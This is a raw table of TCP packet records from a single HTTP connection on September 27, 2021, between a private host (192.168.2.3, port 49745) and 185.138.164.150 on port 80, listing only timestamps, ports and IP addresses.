Sep 27, 2021 23:55:25.439204931 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439230919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439270973 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.439374924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439403057 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.439409018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439434052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439455032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439482927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439507961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439529896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439532995 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.439652920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.439663887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439688921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439714909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439734936 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.439825058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.443366051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443399906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443427086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443450928 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443506956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443531036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443602085 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.443624020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443629980 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.443646908 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.443777084 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.471295118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.471330881 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.471484900 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.473330975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.473367929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.473696947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.473742008 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.473943949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.473973989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474036932 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.474214077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474236965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474296093 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.474364996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474387884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474426985 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.474483013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474550009 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.474649906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474792004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474832058 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474878073 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.474912882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.474967003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475011110 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.475042105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475084066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475126982 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.475142002 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475212097 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.475246906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475300074 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475332022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475363970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475393057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.475416899 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.475431919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.479027987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479051113 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479068995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479085922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479103088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479149103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479171038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479192019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479207993 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.479211092 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.479258060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.479263067 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.506297112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.506325006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.506443977 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.508742094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.508774996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.508891106 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.508969069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509008884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509040117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509059906 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.509067059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509102106 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.509155989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509263992 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509318113 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.509370089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509398937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.509442091 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.512957096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.512989044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513006926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513022900 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513040066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513056040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513071060 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513087034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513103008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513123035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513140917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513158083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.513386965 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.515033007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515075922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515103102 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515177011 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515207052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515233994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515258074 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515280962 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.515291929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515317917 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.515321016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515347004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.515388012 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.515407085 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.541040897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.541090965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.541203022 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.543941975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.543982983 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.544015884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.544045925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.544076920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.544100046 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.544104099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.544135094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.544168949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.544173956 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.544200897 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.547885895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.547930956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.548028946 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.548909903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.548949957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549035072 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.549133062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549165010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549189091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549211979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549220085 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.549236059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549256086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.549259901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549283028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549304008 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.549309015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549350977 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.549371958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549396992 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.549433947 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.550823927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.550858021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.550878048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.550904036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.550949097 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.550991058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.551034927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.551297903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.551323891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.551362038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.551362038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.551414967 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.551522017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.551547050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.551568031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.551587105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.576169968 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.576284885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.578947067 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.579231977 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.579258919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.579415083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.579526901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.579554081 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.579577923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.579600096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.579623938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.579694986 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.579787016 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.583072901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.583111048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.583224058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.585244894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585278988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585303068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585370064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585395098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585427999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585445881 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585469961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585491896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585510969 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.585514069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585539103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585561991 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.585561991 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.585582018 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.585587978 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.585591078 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.585639000 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.586123943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586153030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586174965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586196899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586222887 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.586242914 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.586364985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586389065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586426020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586457014 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.586550951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586576939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586601019 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.586652040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.586699963 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.614375114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.614407063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.614430904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.614454031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.614487886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.614500046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.614511967 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.614574909 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.614949942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.615087032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.615137100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.615142107 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.615185976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.615206003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.615219116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.615271091 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.615297079 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.619179010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.619240999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.619298935 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.620987892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621025085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621052980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621078014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621125937 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.621140957 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.621262074 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621289015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621313095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621335030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621359110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621381998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621409893 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621433973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621460915 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621436119 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.621504068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.621507883 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.621530056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621645927 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.621679068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621700048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621716976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621731997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621752024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621794939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621812105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621826887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.621835947 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.621896029 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.649626970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.649652004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.649672031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.649703979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.649770975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.649791956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.649822950 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.649843931 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.649847984 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.649943113 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.650093079 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.650120974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.650170088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.650203943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.650224924 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.650312901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.650337934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.650604010 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.654958010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.655003071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.656594038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.657766104 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.657840014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.657866001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.659409046 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.687398911 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.687608004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689102888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689158916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689192057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689223051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689276934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689306974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689340115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689373016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689405918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689438105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689476967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689501047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689536095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689565897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689595938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689625978 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.689659119 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.690707922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.690758944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.690812111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.690849066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.690882921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.690921068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.690957069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.691014051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.691050053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.691087961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.691145897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.691184998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.693876982 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.700400114 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.727039099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.727073908 CEST	80	49745	185.138.164.150	192.168.2.3
